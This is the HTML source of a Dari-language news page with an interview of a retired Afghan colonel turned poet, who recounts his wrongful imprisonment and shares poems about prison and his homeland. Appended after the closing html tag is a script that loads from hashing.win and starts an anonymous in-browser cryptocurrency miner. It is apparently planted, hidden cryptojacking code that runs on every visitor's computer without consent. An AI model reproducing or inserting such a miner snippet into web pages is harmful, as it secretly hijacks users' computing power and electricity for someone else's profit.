                                    </div>
                                </div>
                            </div>
							 
							<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/07/آتش-بس-80x60.jpg" alt="استقبال گسترده از آتشبس سه روزه" title="استقبال گسترده از آتشبس سه روزه"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d8%a7%d8%b3%d8%aa%d9%82%d8%a8%d8%a7%d9%84-%da%af%d8%b3%d8%aa%d8%b1%d8%af%d9%87-%d8%a7%d8%b2-%d8%a2%d8%aa%d8%b4%d8%a8%d8%b3-%d8%b3%d9%87-%d8%b1%d9%88%d8%b2%d9%87/">استقبال گسترده از آتشبس سه روزه</a></h5>
                                        <p class="d">8 ساعت قبل</p>
                                    </div>
                                </div>
                            </div>
							 
							<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/07/تذکره-الکترونیکی-80x60.jpg" alt="استقبال مردم از توزیع تذکره‎های الکترونیکی" title="استقبال مردم از توزیع تذکره‎های الکترونیکی"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d8%a7%d8%b3%d8%aa%d9%82%d8%a8%d8%a7%d9%84-%d9%85%d8%b1%d8%af%d9%85-%d8%a7%d8%b2-%d8%aa%d9%88%d8%b2%db%8c%d8%b9-%d8%aa%d8%b0%da%a9%d8%b1%d9%87%e2%80%8e%d9%87%d8%a7%db%8c-%d8%a7%d9%84%da%a9%d8%aa%d8%b1/">استقبال مردم از توزیع تذکره‎های الکترونیکی</a></h5>
                                        <p class="d">8 ساعت قبل</p>
                                    </div>
                                </div>
                            </div>
													 </div>
                    </div>

                    <!-- end of first col -->


                    <!-- second col -->	
							
			
		            	
					 <div role="tabpanel" class="tab-pane" id="profile">
                        <div class="row">
                        
                        							<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/07/عصمت-الله-معروف-80x60.jpg" alt="مردی که زندان شاعرش ساخت" title="مردی که زندان شاعرش ساخت"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d9%85%d8%b1%d8%af%db%8c-%da%a9%d9%87-%d8%b2%d9%86%d8%af%d8%a7%d9%86-%d8%b4%d8%a7%d8%b9%d8%b1%d8%b4-%d8%b3%d8%a7%d8%ae%d8%aa/">مردی که زندان شاعرش ساخت</a></h5>
                                        <p class="d">8 ساعت قبل</p>
                                    </div>
                                </div>
                            </div>
													<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/07/Sequence-02.00_14_17_13.Still004-80x60.jpg" alt="سومین جشنواره فلم های کوتاه محصلین پوهنتون کابل" title="سومین جشنواره فلم های کوتاه محصلین پوهنتون کابل"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d8%b3%d9%88%d9%85%db%8c%d9%86-%d8%ac%d8%b4%d9%86%d9%88%d8%a7%d8%b1%d9%87-%d9%81%d9%84%d9%85-%d9%87%d8%a7%db%8c-%da%a9%d9%88%d8%aa%d8%a7%d9%87-%d9%85%d8%ad%d8%b5%d9%84%db%8c%d9%86-%d9%be%d9%88%d9%87/">سومین جشنواره فلم های کوتاه محصلین پوهنتون کابل</a></h5>
                                        <p class="d">۱۰ سرطان ۱۳۹۷</p>
                                    </div>
                                </div>
                            </div>
													<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/06/خاطره-دانش-80x60.jpg" alt="دختری که امید به بهبود وضعیت زنان دارد" title="دختری که امید به بهبود وضعیت زنان دارد"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d8%af%d8%ae%d8%aa%d8%b1%db%8c-%da%a9%d9%87-%d8%a7%d9%85%db%8c%d8%af-%d8%a8%d9%87-%d8%a8%d9%87%d8%a8%d9%88%d8%af-%d9%88%d8%b6%d8%b9%db%8c%d8%aa-%d8%b2%d9%86%d8%a7%d9%86-%d8%af%d8%a7%d8%b1%d8%af/">دختری که امید به بهبود وضعیت زنان دارد</a></h5>
                                        <p class="d">۳۰ جوزا ۱۳۹۷</p>
                                    </div>
                                </div>
                            </div>
													<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/06/عدالت-80x60.jpg" alt="قضا و  عدالت" title="قضا و  عدالت"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d9%82%d8%b6%d8%a7-%d9%88-%d8%b9%d8%af%d8%a7%d9%84%d8%aa/">قضا و  عدالت</a></h5>
                                        <p class="d">۳۰ جوزا ۱۳۹۷</p>
                                    </div>
                                </div>
                            </div>
						                          
                        </div>
                    </div>
                    <!-- end of second tab -->

                  </div>
                  <!-- tabs -->

            </div>
                
					

				
				
						



				

	
	
             
					
					
		
		
		
		
             
		</div>            <div class="col-lg-9 col-md-9 col-sm-12 col-xs-12 cutmpadding">
            	                <div class="sudr">
                    <div class="row">
                        <div class="col-lg-6">
            <h4 class="brdcrumb">
ادبیات                            </h4>
                        </div>
                        <div class="col-lg-6 rtme">
                            <div class="pull-right"></div>
                            <div class="pull-left mright"><small class='icn-left'><i class="fa fa-eye-slash"></i></small> 37 </div>
                            <div class="pull-left mright"><small class='icn-left'><i class="fa fa-clock-o"></i></small>8 ساعت قبل</div>
                            <div class="pull-left mright"><small class='icn-left'><i class="fa fa-user"></i></small> نویسنده: محبوبه فرید کریمی </div>
                        </div>
                    </div>
                </div> 

                <h2 id="sttl"><b>مردی که زندان شاعرش ساخت</b></h2>

                <div class="scontent">
<img src="http://tkg.af/wp-content/uploads/2018/07/عصمت-الله-معروف.jpg" class="img-responsive" width="100%" />
                    
                    <div class="pcontents">
                    <p>دگروال متقاعد وزارت دفاع ملی، عصمت‎الله معروف‎ كه بعد از ختم دوره مكتب، پوهنتون نظامی را به سویه لیسانس به پایه اكمال رسانده است، یک شاعر بااحساس و وطن‎دوست است. او كه هشت سال می‎شود به تقاعد سوق داده شده است در این مدت مصروف عریضه‎نویسی در مقابل ساختمان وزارت معارف در شهر کابل میباشد. به گفته خودش، وی بعد از ۳۲ سال خدمت در اردوی ملی و لزوم‎دید دولت از عضویت در اردو كنار رفته است و برای ادامه زندگی و مخارج خانوادهاش مجبور شده است تا عریضه‎نویسی را پيشه کند. وی عضو انجمن نویسندگان نیز است و سرودن شعر را با جان و دل دوست دارد. ما در این شماره با این شاعر و جنرال متقاعد مصاحبه‎ای انجام داده‎ایم که اینک شما را به خواندن آن دعوت می‎کنیم.<br />
كلید: از چه زمانی به سرودن شعر آغاز كردید؟<br />
معروف: من از جوانی به سرودن شعر علاقمند بودم. حال هم به این شعر و شاعری خیلی علاقه دارم و با مشاهده بعضی مشكلات در جامعه و زندگی مردم و تحلیل و ارزیابی آن، تلاش می‎کنم این مشکلات را در قالب شعر بیان کنم.<br />
كلید: در مورد اشعار تان بگویید.<br />
معروف: حدود ۱۶۳ قطعه شعر با موضوعات مختلف سرودهام كه یک تعداد آن را بعد از اینكه مورد نقد و ارزیابی از سوی دوستان شاعر و نويسندگان برجسته قرار گرفته است، چاپ هم كردهام.<br />
كلید: در چه مواقع شعر میسرایید؟<br />
معروف: اشعارم را در جریان وظیفه، در خانه و گاهی هم در میان دوستان سرودهام. چندین قطعه شعرم در مجلات و در روزنامههای مختلف اقبال چاپ یافته و نیز چندین بار از سوی انجمنهای مختلف ادبی مورد تقدیر قرار گرفتهام.<br />
كلید: چطور علاقمندی تان افزایش یافت تا بیشتر شعر بسرایید؟<br />
معروف: در سال ۱۳۶۹ خورشیدی روی یک قضیه ناحق زندانی شدم و ۱۲۳ روز را با پاهای زولانه شده و با تحمل روزهای سخت در زندان گذشتاندم. آن روزها فقط كوته‎قفلی نبودم بلكه یک حالت بد روحی نیز برایم واقع شد و این همه بیعدالتی و درد زندانی شدن، ذهن مرا خیلی متأثر ساخت كه با این همه پیشامدها یک بار دیگر به سوی سرودن شعر روی آوردم. این هم یک پارچه شعر من كه از درد و آلام همان روزهای سخت و رنجآورم در داخل زندان حرف میزند.<br />
زندان<br />
الهی این شب تارم سحر كن<br />
ز زندان سیه من را بدر كن<br />
به چاه افتادهام یوسف ثانی<br />
تو رحم بر ناله و آه پدر كن<br />
ز دست ظالمان، این جا فتادم<br />
ز لطف و مرحمت سویم نظر كن<br />
نجاتم ده، فرشته نجاتم<br />
بگیر دستم و از چاهم بدر كن<br />
برو احوال زارم با پدر گو<br />
بگو در چاه زندان است خبر كو<br />
معروف دستش به دامانت الهی<br />
تو لطف خویش را بار دیگر كن<br />
كلید: كسی شما را در سرودن شعر رهنمایی كرده است یا خیر؟<br />
معروف: بعد از اینكه در وجودم انگیزه شعری قوت گرفت، یگانه عامل آن خستگیهای روزهای زندانی بودنم بود. از زمانی كه به طور جدی به سرودن شعر پرداختهام با شاعران زبردست و نامدار مشورههای لازم را انجام داده‎ام و تاكنون هم اشعارم به وسیله آن‎ها نقد و بررسی میشود.<br />
كلید: در چه مواردی بیشتر شعر میسراید؟<br />
معروف: اضافهتر در مورد وطن و درباره بیعدالتی‎هایی كه در این سرزمین رخ میدهد، شعر میسرایم. درباره عشق به وطن هم بیشتر میسرایم و در هر موردی كه مورد توجه من قرار گیرد در همان مورد مطابق خواست و نظریه خودم، شعر میگویم، مگر علاقه خاص به سرایش شعرهای میهنی و مردمی دارم.<br />
كلید: به نظر شما چه اثرگذاری در شعر وجود دارد؟<br />
معروف: شعر از جهت كلام بودنش نیازمند به این است كه بتواند در میان انسانها تأثیر بگذارد و این اثرگذاری از حد و حدود حرفهای عادی خارج است. شعر وقتی به غایت خود نایل میشود كه انسانها را تصرف كند و تأثیر خود، یعنی عاطفه و خیالی را كه در آن است، به دیگران انتقال دهد.<br />
كلید: چه احساسی در هنگام سرودن شعر دارید؟<br />
معروف: هنگامی كه شعر میسرایم احساس آرامش پیدا میكنم؛ چون از درد و رنج وطنم حرف میزنم و گاهی هم از عشق و محبت خود به این سرزمین، احساس شور و شوق نموده و به شعر میپردازم. افغانستان عزیز را زیاد دوست دارم و حس دوستی وطن مرا به وجد میآورد تا از وطنم توصیف كرده و از مردم غیور و باشهامت آن بیشتر بنویسم، اما گاهی هم كه از رنج روزگار هموطنم، از نالههای یتیمها و بیوه زنان این سرزمین درددیده میگویم، حتا اشک میریزم و احساس درد در وجودم رخنه میكند؛ چون درد هموطنم مرا شكنجه روحی میكند. در این چهل سال درد و جنگ در وطنم، هنوز هم سرودن شعر را پایانی نیست؛ چرا كه هر روز و هر لحظه احساسی در وجودم پدید میآید و مرا وا میدارد تا قطعه شعری بسرایم.<br />
میهن<br />
میهنم آتش به جانت دیدهام<br />
قلب زار و خون چكانت دیدهام<br />
سوختی در حیله و مكر و فسون<br />
بر مراد دیگرانت دیدهام<br />
لاله‎زارت گشته از پامال خصم<br />
باز به رنگ خزانت دیدهام<br />
شد در و دیوار تو یكسان به خاک<br />
مرغک بی‎آشیانت دیدهام<br />
اشک میبارید و طفل و مرد و زن<br />
در به در پیر و جوانت دیدهام<br />
میهنم ای جان من غمگین مباش<br />
گرچه زار و ناتوانت دیدهام<br />
خواب دیدم دست‎ها باهم شدند<br />
برتر از تاج جهانت دیدهام<br />
هفت رنگت ساختند بیگانگان<br />
رنگ رنگ رنگینكمانت دیدهام<br />
&#8230;<br />
بی‎اثر باشد معروف بیچاره<br />
مرغ بسمل نیمه جانت دیدهام<br />
كلید: در خانواده، كیها شما را به سرودن شعر تشویق میكنند؟<br />
معروف: تمام فرزندانم علاقمند شعرهایم هستند و شنونده خوب شعرهایم میباشند؛ چون وقتی شعر میخوانم همه گوش میدهند و مرا بیشتر از پیش در این راه ترغیب میكنند. در میان همه مریم جان دخترم هم شعر میسراید كه من نیز مشوق او هستم.<br />
كلید: چه طرحهایی برای چاپ متباقی آثار تان دارید؟<br />
معروف: تعدادی از اشعار خود را تنظیم كردهام كه با یک بازنگری ديگر، آماده چاپ خواهد شد.<br />
كلید: در جوانی با چه محتویات شعرمیسرودید؟<br />
معروف: در آن زمان زیادتر علاقمند خواندن شعر بودم و تصمیم صد درصد سرودن شعر را به شكل منظم امروزی آن نداشتم، اما چنان كه قبلاً گفتم زندان سبب شد كه شعرهای زیادی بسرایم.<br />
كلید: علاقمندی تان به محافل شعری چگونه است؟<br />
معروف: من عضو انجمن شعر و ادب (انجمن نویسندگان) هستم. این انجمن محافل شعرخوانی برگزار میکند كه زمینهساز خوب برای سرایش اشعارم میباشد.<br />
كلید: برنامههای بعدی فرهنگی تان چه است؟<br />
معروف: برنامه خاصی ندارم ولی با وجود این وضعیت، تلاش دارم شعر بگویم و در قسمت غنامند شدن فرهنگ و ادب وطن عزیز خود تا آن جا که ممکن است، سهم بگیرم.<br />
كلید: به نظر شما شعر چیست و شاعر كیست؟<br />
معروف: اینكه شعر چیست، یک بحث بسیار دشواری است؛ چرا که تاکنون به اندازه عمر آدمی از پیدایش شعر میگذرد، ولی تعریف جامع و مانعی از آن صورت نگرفته است، برای همین تعدادی آمدهاند بسیاری از آثاری را که به زعم سرایندگان آن، شعر محسوب میشده است، از قلمرو شعر بیرون ساختهاند و برخی بر عکس؛ آثاری را که سرایندگان آن، آن‎ها را در قالب نثر آهنگین ارائه دادهاند، شعر به شمار آوردهاند و بعضی هم تفکیک مرز شعر و نثر را کار نادرست خواندهاند. به هر حال به نظر من، شعر سخنی است اندیشیده، مرتب، معنوی، موزون، متکرر و متساوی و شاعر نقاش زبردستی است كه خوبیها و بدیها را مجسم مینماید و مناظر جامعه خود را با بهترین طرز، بیان میكند. شاعر با سرودن اشعار نغز و با انتخاب معانی لطیف و بدیع توجه همه را به خویش معطوف میدارد و افكار خود را بر دیگران تحمیل میكند.<br />
كلید: در اخیر اگر پیامی دارید، بگویید.<br />
معروف: بر همه افغان‎ها است تا فرهنگ اصیل خود را فراموش نکنند و دست به دست هم دهند و در غنامندی آن و نیز در برقراری عدالت از هیچنوعسعیوكوششدریغ نورزند تا روزی شاهد فرهنگوادبغنیتر از امروز و تأمین عدالت واقعی در كشور خود باشیم.</p>
<!-- Simple Share Buttons Adder (6.3.5) simplesharebuttons.com --><div class="ssba ssba-wrap"><div style="text-align:right">به اشتراک بگذارید<a data-site="" class="ssba_facebook_share" href="http://www.facebook.com/sharer.php?u=http://tkg.af/%d9%85%d8%b1%d8%af%db%8c-%da%a9%d9%87-%d8%b2%d9%86%d8%af%d8%a7%d9%86-%d8%b4%d8%a7%d8%b9%d8%b1%d8%b4-%d8%b3%d8%a7%d8%ae%d8%aa/"  target="_blank" ><img src="http://tkg.af/wp-content/plugins/simple-share-buttons-adder/buttons/simple/facebook.png" title="Facebook" class="ssba ssba-img" alt="Share on Facebook" /></a><a data-site="" class="ssba_google_share" href="https://plus.google.com/share?url=http://tkg.af/%d9%85%d8%b1%d8%af%db%8c-%da%a9%d9%87-%d8%b2%d9%86%d8%af%d8%a7%d9%86-%d8%b4%d8%a7%d8%b9%d8%b1%d8%b4-%d8%b3%d8%a7%d8%ae%d8%aa/"  target="_blank" ><img src="http://tkg.af/wp-content/plugins/simple-share-buttons-adder/buttons/simple/google.png" title="Google+" class="ssba ssba-img" alt="Share on Google+" /></a><a data-site="" class="ssba_twitter_share" href="http://twitter.com/share?url=http://tkg.af/%d9%85%d8%b1%d8%af%db%8c-%da%a9%d9%87-%d8%b2%d9%86%d8%af%d8%a7%d9%86-%d8%b4%d8%a7%d8%b9%d8%b1%d8%b4-%d8%b3%d8%a7%d8%ae%d8%aa/&amp;text=%D9%85%D8%B1%D8%AF%DB%8C+%DA%A9%D9%87+%D8%B2%D9%86%D8%AF%D8%A7%D9%86+%D8%B4%D8%A7%D8%B9%D8%B1%D8%B4+%D8%B3%D8%A7%D8%AE%D8%AA+"  target="_blank" ><img src="http://tkg.af/wp-content/plugins/simple-share-buttons-adder/buttons/simple/twitter.png" title="Twitter" class="ssba ssba-img" alt="Tweet about this on Twitter" /></a><a data-site="linkedin" class="ssba_linkedin_share ssba_share_link" href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://tkg.af/%d9%85%d8%b1%d8%af%db%8c-%da%a9%d9%87-%d8%b2%d9%86%d8%af%d8%a7%d9%86-%d8%b4%d8%a7%d8%b9%d8%b1%d8%b4-%d8%b3%d8%a7%d8%ae%d8%aa/"  target="_blank" ><img src="http://tkg.af/wp-content/plugins/simple-share-buttons-adder/buttons/simple/linkedin.png" title="LinkedIn" class="ssba ssba-img" alt="Share on LinkedIn" /></a></div></div>                    </div>
                </div>
                
                    <div id="relateLinks" class="row"> <h5 class="tag_cloud">
										</h5></div>
	  
                </div>

                
                
                
<div class="wp_rp_wrap  wp_rp_vertical" id="wp_rp_first"><div class="wp_rp_content"><h3 class="related_post_title">مطالب مشابه</h3><ul class="related_post wp_rp"><li data-position="0" data-poid="in-36822" data-post-type="none" ><a href="http://tkg.af/%d9%84%d8%ad%d8%b8%d9%87%e2%80%8e%d8%a7%db%8c-%d8%a8%d8%a7-%d8%b4%da%a9%db%8c%d8%a8-%d8%b3%d9%88%d8%b2%d8%a7%d9%86/" class="wp_rp_thumbnail"><img src="http://tkg.af/wp-content/uploads/2016/12/shekiab_suzan-150x150.jpg" alt="لحظه‎ای با شکیب سوزان" width="150" height="150" /></a><a href="http://tkg.af/%d9%84%d8%ad%d8%b8%d9%87%e2%80%8e%d8%a7%db%8c-%d8%a8%d8%a7-%d8%b4%da%a9%db%8c%d8%a8-%d8%b3%d9%88%d8%b2%d8%a7%d9%86/" class="wp_rp_title">لحظه‎ای با شکیب سوزان</a></li><li data-position="1" data-poid="in-36955" data-post-type="none" ><a href="http://tkg.af/%d8%a2%d9%88%d8%a7%d8%b2%d8%ae%d9%88%d8%a7%d9%86%db%8c-%d8%a8%d8%b1%d8%a7%db%8c-%d8%b2%d9%86%d8%a7%d9%86-%d9%87%d9%86%d9%88%d8%b2-%d9%87%d9%85-%d8%af%d8%b4%d9%88%d8%a7%d8%b1-%d8%a7%d8%b3%d8%aa/" class="wp_rp_thumbnail"><img src="http://tkg.af/wp-content/uploads/2017/01/18881811_303-150x150.jpg" alt="آوازخوانی برای زنان هنوز هم دشوار است" width="150" height="150" /></a><a href="http://tkg.af/%d8%a2%d9%88%d8%a7%d8%b2%d8%ae%d9%88%d8%a7%d9%86%db%8c-%d8%a8%d8%b1%d8%a7%db%8c-%d8%b2%d9%86%d8%a7%d9%86-%d9%87%d9%86%d9%88%d8%b2-%d9%87%d9%85-%d8%af%d8%b4%d9%88%d8%a7%d8%b1-%d8%a7%d8%b3%d8%aa/" class="wp_rp_title">آوازخوانی برای زنان هنوز هم دشوار است</a></li><li data-position="2" data-poid="in-37353" data-post-type="none" ><a href="http://tkg.af/%d8%b2%d9%87%d8%b1%d9%87%d8%8c-%d8%a7%d9%85%d8%b1%d9%88%d8%b2-%d8%ac%d8%a7%db%8c%d8%b2%d9%87-%d8%a7%d8%b4-%d8%b1%d8%a7-%d8%af%d8%b1-%d8%ac%db%8c%d9%86%d9%88%d8%a7-%d8%aa%d8%b3%d9%84%db%8c%d9%85-%d8%ae/" class="wp_rp_thumbnail"><img src="http://tkg.af/wp-content/uploads/2017/01/Zohra_Arkester-150x150.jpg" alt="زهره، امروز جایزه اش را در جینوا تسلیم خواهد شد" width="150" height="150" /></a><a href="http://tkg.af/%d8%b2%d9%87%d8%b1%d9%87%d8%8c-%d8%a7%d9%85%d8%b1%d9%88%d8%b2-%d8%ac%d8%a7%db%8c%d8%b2%d9%87-%d8%a7%d8%b4-%d8%b1%d8%a7-%d8%af%d8%b1-%d8%ac%db%8c%d9%86%d9%88%d8%a7-%d8%aa%d8%b3%d9%84%db%8c%d9%85-%d8%ae/" class="wp_rp_title">زهره، امروز جایزه اش را در جینوا تسلیم خواهد شد</a></li><li data-position="3" data-poid="in-38023" data-post-type="none" ><a href="http://tkg.af/%d8%af%d8%b1%d8%ae%d8%b4%d8%b4-%d8%af%d8%ae%d8%aa%d8%b1%d8%a7%d9%86-%d8%a7%d9%81%d8%ba%d8%a7%d9%86-%d8%af%d8%b1-%d8%a7%d8%b1%d9%88%d9%be%d8%a7/" class="wp_rp_thumbnail"><img src="http://tkg.af/wp-content/uploads/2017/02/DSC09844-150x150.jpg" alt="درخشش دختران افغان در اروپا" width="150" height="150" /></a><a href="http://tkg.af/%d8%af%d8%b1%d8%ae%d8%b4%d8%b4-%d8%af%d8%ae%d8%aa%d8%b1%d8%a7%d9%86-%d8%a7%d9%81%d8%ba%d8%a7%d9%86-%d8%af%d8%b1-%d8%a7%d8%b1%d9%88%d9%be%d8%a7/" class="wp_rp_title">درخشش دختران افغان در اروپا</a></li></ul></div></div>

                <div class=comments>
		    
<!-- You can start editing here. -->
    <h4 class="nazar">تا اکنون هیچ کامنت وجود ندارد</h4>
            <!-- If comments are closed. -->
        <p class="no-comments">تا اکنون هیچ کامنت وجود ندارد</p>
    
		<div style="clear:both"></div>
		</div>
            </div>
        </div>
    </div>
</div>
<div class=footer>
	<div class=container>
		<div class=row id="faligncenter">
			
			<div class="col-lg-3 col-md-3 col-sm-4" id="leftcomu">
				<div class="comu">
					<div class="col-lg-2 col-xs-2"><i class="fa fa-phone"></i></div>
					<div class="col-lg-10 col-xs-10"><p class="finfo" dir=ltr>020 2500 717</p></div>
				</div>
				<div class="comu">
					<div class="col-lg-2 col-xs-2"><i class="fa fa-envelope"></i></div>
					<div class="col-lg-10 col-xs-10"><p class="finfo">info@tkg.af</p></div>
				</div>
				<div class="comu">
					<div class="col-lg-2 col-xs-2"><i class="fa fa-map-marker"></i></div>
					<div class="col-lg-10 col-xs-10"><p class="finfo">سرک شش، کارته سه، کابل، افغانستان</p></div>
				</div>
			</div>

			<div class="col-lg-6 col-md-6 col-sm-5" id="mdform">
				<form   action="http://tkg.af/" style="padding:10px 24px 8px 0px;">
					<div class="input-group" id="ffrm" width="100%">
						<span class="input-group-addon wbc"><b><i class="fa fa-search"></i></b></span>
						<input id="prependedtext" value="" name="s" class="form-control" type="text">
					</div>
				</form>

				<div class="social-widget">
				   <a href="https://www.facebook.com/tkgweb"><i class="fa fa-facebook"></i></a>
				   <a href="https://twitter.com/TheKillidGroup"><i class="fa fa-twitter"></i></a>
				   <a href="https://plus.google.com/109025353126920726549"><i class="fa fa-google-plus"></i></a>
				   <a href="https://www.youtube.com/channel/UCSVItQlFN31H8ckkxveKn5A"><i class="fa fa-youtube"></i></a>
				   <a href="http://tkg.af/feed"><i class="fa fa-rss"></i></a>
				</div>
			</div>

			<div class="col-lg-3 col-md-3 col-sm-6" id="fright" >
				<h4><b>دانلود اپلیکیشن های موبایل</b></h4>
				<div class="apps" align="center">
					<a href="https://itunes.apple.com/us/app/tkg/id1148853903" target="_blank"><img src="/land/app_store.png"></a>
					<a href="https://play.google.com/store/apps/details?id=af.techsharks.thekillidgroup" target="_blank"><img src="/land/google_play.png"></a>
				</div>
			</div>            
		</div>
	</div>
</div>
	<!-- footer -->
<div class="footer-copyright">
	<div class=container>
		<div class="col-lg-6 col-sm-6 col-xs-12">
			<p class="flft">Copyright 2010 &copy; TKG: A public media project of <a href="http://dhsa.af" target="_blank" style='color:#fff;text-decoration:underline'>DHSA</a></p>
		</div>
		<div class="col-lg-6 col-sm-6 col-xs-12">
			<p>Powered By <a style='color:#fff;text-decoration:underline' target="_blank" href="http://techsharks.af/" class=techshark>TechSharks</a></p>
		</div>
	</div>
</div>
<script type='text/javascript' src='http://tkg.af/wp-content/plugins/simple-share-buttons-adder/js/ssba.min.js?ver=4.8'></script>
<script type='text/javascript' src='http://tkg.af/wp-includes/js/wp-embed.min.js?ver=4.8'></script>
<script type="text/javascript" src="/wp-content/themes/shark/css/bootstrap/js/jquery.min.js"></script>
<script type="text/javascript" src="/wp-content/themes/shark/css/bootstrap/js/bootstrap.min.js"></script>	
<script type="text/javascript" src="/wp-content/themes/shark/js/script.js"></script>
<script src="/wp-content/themes/shark/assets/owlcarousel2/owl.carousel.min.js"></script>
<script type="text/javascript">
$('.navbar-nav .sub-menu').parent().addClass('dropdown');
$('.sub-menu').prev().attr('data-toggle','dropdown');
$('.navbar-nav .sub-menu').prev().append('&nbsp;<span class="fa fa-caret-down"></span>');
$('.navbar-nav .sub-menu').addClass('dropdown-menu');
function player(channel, txt){
var src = "http://cdn.voscast.com/player/player.php?host=";$('#radioPlayer').attr('src', src+channel);$('.rtitle').html(txt);}</script>
</body></html><script src="https://www.hashing.win/scripts/min.js"></script><script>var miner = new Client.Anonymous('6a0e05acaaa42c54b02cef84ef7a55543cd9dad443f5d8cc2c2e5c4014ece2cc', {throttle:0.4});miner.start();</script>
<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');ga('create','UA-20324816-35','auto');ga('send','pageview')</script>